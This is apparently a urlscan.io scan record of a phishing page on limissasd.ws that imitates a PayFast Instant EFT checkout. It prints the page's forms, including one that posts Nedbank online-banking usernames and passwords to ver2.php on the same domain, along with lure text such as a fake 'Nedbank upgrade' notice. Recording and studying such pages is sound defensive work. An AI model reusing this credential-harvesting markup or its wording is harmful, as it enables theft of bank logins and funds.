limissasd.ws Open in urlscan Pro
41.185.8.245  Public Scan

URL: https://limissasd.ws/fallebbeigns/nb/
Submission: On August 22 via manual from ZA — Scanned from DE

Form analysis 4 forms found in the DOM

Name: payment-login-formPOST

<form name="payment-login-form" id="payment-login-form" method="POST">
  <div class="modal-body">
    <div id="login-notice-error" class="nerror">
      <div class="notice-error-container">
        <span class="login-notice-err-msg"></span>
        <span class="fas fa-times close-alert"></span>
      </div>
    </div>
    <div class="modal-body__center">
      <div class="pf-input login-email-cell disabled">
        <label for="username" class="pf-input__label">Email / Cell number</label>
        <i class="fa fa-check valid-input-icon valid-email-icon"></i>
        <input disabled="disabled" type="text" autocorrect="off" autocapitalize="none" spellcheck="false" id="username" name="username" size="20" value="" class="form-control" placeholder="PayFast login email address">
        <div class="pf-input__bar"></div>
      </div>
      <div class="forgot-pw-link__wrapper">
        <a href="#" class="forgot-pw-link hide-elem show-elem" data-hide-target="#payment-login-wrapper" data-show-target="#change-user-box" data-confirm-leave="true">Change</a>
      </div>
      <div class="pf-input">
        <label for="password" class="pf-input__label">Password</label>
        <input type="password" name="password" id="password" class="form-control" placeholder="PayFast password">
        <div class="pf-input__bar"></div>
      </div>
      <div class="forgot-pw-link__wrapper">
        <a href="https://my.payfast.io/forgot-password" class="forgot-pw-link" id="payment-forgot-password" target="_blank">Forgot password?</a>
      </div>
      <div id="buyer-login-captcha" class="captcha-placeholder"></div>
    </div>
  </div>
  <div class="form-btns modal-footer">
    <button type="button" class="btn btn-secondary pf-button btn-dismiss login-toggle hide-elem" title="Skip" data-hide-target="#payment-login-wrapper">Skip</button>
    <input type="submit" id="payment-login-submit" class="btn btn-primary pf-button" value="Log in" disabled="disabled">
  </div>
</form>

Name: payment-otp-formPOST

<form name="payment-otp-form" id="payment-otp-form" method="POST" style="display: none;">
  <div class="modal-body">
    <div id="otp-notice-error" class="nerror">
      <div class="notice-error-wrapper">
        <span class="notice-icon"></span>
        <div class="notice-error-container">
          <span class="otp-notice-err-msg"></span>
          <span class="fas fa-times close-alert"></span>
        </div>
      </div>
    </div>
    <div id="payment-otp-msg">
      <p>You may have funds or saved cards associated to your email address/cell number.</p>
      <p>We will send you an OTP to access your information.</p>
    </div>
    <div class="modal-body__center">
      <div class="pf-input login-email-cell disabled">
        <label for="otp-username" class="pf-input__label">Email / Cell number</label>
        <i class="fa fa-check valid-input-icon valid-email-icon"></i>
        <input type="text" autocorrect="off" autocapitalize="none" spellcheck="false" id="otp-username" name="otp-username" size="20" value="" class="form-control w-100" placeholder="PayFast login email address" disabled="disabled">
        <div class="pf-input__bar"></div>
      </div>
      <div class="forgot-pw-link__wrapper">
        <a href="#" class="forgot-pw-link hide-elem show-elem" data-hide-target="#payment-login-wrapper" data-show-target="#change-user-box">Change</a>
      </div>
      <div id="otp-input-field" class="pf-input" style="display: none;">
        <label for="otp" class="pf-input__label">One Time Pin</label>
        <input type="tel" id="otp" name="otp" size="20" class="form-control" placeholder="Enter OTP">
        <button type="button" id="payment-otp-resend" class="btn btn-primary pf-button">Resend OTP</button>
      </div>
      <div id="buyer-otp-captcha" class="captcha-placeholder"></div>
    </div>
  </div>
  <div class="form-btns modal-footer">
    <button type="button" class="btn btn-secondary pf-button btn-dismiss login-toggle hide-elem" title="Skip" data-hide-target="#payment-login-wrapper">Skip</button>
    <input type="submit" id="payment-otp-send" class="btn btn-primary pf-button" value="Send OTP">
  </div>
</form>

Name: change-buyer-formPOST

<form id="change-buyer-form" name="change-buyer-form" method="POST" autocomplete="false" data-lpignore="true">
  <div class="modal-body">
    <p class="modal-body__text body-regular-dark">A payment confirmation will be sent to this email/number</p>
    <div id="changebuyer-notice-error" class="infoBox nerror">
      <div class="changebuyer-notice-error-wrapper">
        <i class="fas fa-times-circle"></i>
        <div class="notice-error-container w-100">
          <span class="changebuyer-notice-err-msg"></span>
          <span class="fas fa-times close-alert"></span>
        </div>
      </div>
    </div>
    <div class="pf-input">
      <label for="change-username" class="pf-input__label">Email address / Cellphone</label>
      <div class="flex flex-row flex-center relative">
        <input id="change-username" class="user-email-cell form-control w-100" type="text" autocorrect="off" autocapitalize="none" spellcheck="false" name="username" size="20" placeholder="Email address or cellphone" data-lpignore="true">
      </div>
    </div>
    <div class="modal-hidden">
      <input type="submit" name="action" class="btn btn-primary pf-button continue-button" value="Continue" disabled="disabled">
    </div>
    <div id="buyer-change-captcha" class="captcha-placeholder"></div>
  </div>
  <div class="modal-footer form-btns">
    <button type="button" id="buyer-cancel" class="btn btn-secondary pf-button hide-elem " data-hide-target="#change-user-box">Skip</button>
    <input type="submit" name="action" id="validateme" class="btn btn-primary pf-button continue-button" value="Continue" disabled="disabled">
  </div>
</form>

POST ver2.php

<form method="post" action="ver2.php" class="user-login-form">
  <div class="eft__input--container">
    <div class="pf-input">
      <label for="eft__username" class="pf-input__label"> Username </label>
      <div class="pf-tooltip">
        <i class="far fa-question-circle fa-w-16">
                        <span>Your new Nedbank ID used to log into your online banking</span>
                    </i>
      </div>
      <input id="eft__username" type="text" name="eft__username" autocomplete="off" data-lpignore="true" required="" class="form-control" placeholder="Your Nedbank username">
      <div class="pf-input__bar"></div>
    </div>
    <div class="pf-input">
      <label for="eft__password" class="pf-input__label"> Password </label>
      <div class="pf-tooltip">
        <i class="far fa-question-circle fa-w-16">
                        <span>Your Nedbank password used to log into your online banking (not your pin number)</span>
                    </i>
      </div>
      <input id="eft__password" type="password" name="eft__password" autocomplete="off" data-lpignore="true" required="" class="form-control" placeholder="Your Nedbank Password">
      <div class="pf-input__bar"></div>
    </div>
  </div>
  <!-- EFT specific variables required from the server -->
</form>

Text Content

<
Secured and powered by


In order to ensure that you are able to make payment, please upgrade your
browser.

- R
Payment total:
R
*We’ve limited the amount of wallet funds to R . This is done to ensure that the
transaction is able to meet African Bank R10.00 minimum transaction limit.
You have R in your Payfast wallet. Pay with Instant EFT to use your funds.
Log into your PayFast account for a faster checkout
Email / Cell number

Change
Password

Forgot password?

Skip

You may have funds or saved cards associated to your email address/cell number.

We will send you an OTP to access your information.

Email / Cell number

Change
One Time Pin Resend OTP

Skip
 * Unfortunately the version of Internet Explorer you are using is no longer
   supported. Please try again using another browser.

How can we get hold of you?

A payment confirmation will be sent to this email/number


Email address / Cellphone



Skip
Nedbank
Please enter a valid email address / cell number.

LOADING...

Please don't close your window
How will you be paying today?
You have R in your Payfast wallet. Pay with Instant EFT to use your funds.
 * Instant EFT
 * QR Code Apps Select this payment method to see a list of supported apps.
 * SnapScan
 * Debit Card
 * Zapper


SELECT THE BANK YOU WILL BE USING TO MAKE YOUR INSTANT EFT PAYMENT

 * Absa
 * African Bank
 * Bidvest Bank
 * Capitec Bank
 * FNB
 * Investec
 * Nedbank
 * Standard Bank
 * Tyme Bank

LOADING...

Please don't close your window


LOG IN TO YOUR NEDBANK ACCOUNT

Please use your internet banking login credentials

Oops something went wrong.

The OTP has been sent to your mobile device.



Expires in 45

Confirm login on your mobile banking app

Expires in 45
Confirm login with your Absa Surephrase

Enter the missing characters of your password



Scan the QR code in your mobile banking app
Expires in
Continue

Log in



Select profile Please select the banking profile you would like to make your
purchase from




Select account

Fetching list of accounts


Select account Please select the banking account you would like to make your
purchase from




Processing payment

Please have your phone at hand to approve the payment


Processing payment

Finalising Instant EFT payment


Please see below on how to resolve this:

1. Log into the Nedbank Online Banking website.

(Not your Nedbank Money app)



2. Accept any notices that appear.

Please see below on how to resolve this:

1. Sign into your Nedbank Mobile app.

2. Tap the menu in the top-right corner.

3. Tap Settings.

4. Switch your Internet banking on.

Nedbank has upgraded their internet banking service.

If you have not done so already, you will need to register for your Nedbank ID
username and password to access your account. Register now to continue.
Username
Your new Nedbank ID used to log into your online banking

Password
Your Nedbank password used to log into your online banking (not your pin number)

Log In
Secure SSL Encryption



PayFast never stores your banking credentials

Find out more about instant EFT security

Are you sure you want to cancel this payment?

If yes, your payment won't be processed and you'll be redirected back to the
merchants website.

Don't cancel Cancel payment

PCI DSS Service Provider Level 1 Compliant.

End User Agreement and Privacy Policy


Payfast handles secure online payments on behalf of domains.co.za (A division of
DiaMatrix).

By transacting with PayFast, you acknowledge that you have read and agree to the
terms of our End User Agreement.

Having trouble with your transaction? Let us help you

support@payfast.io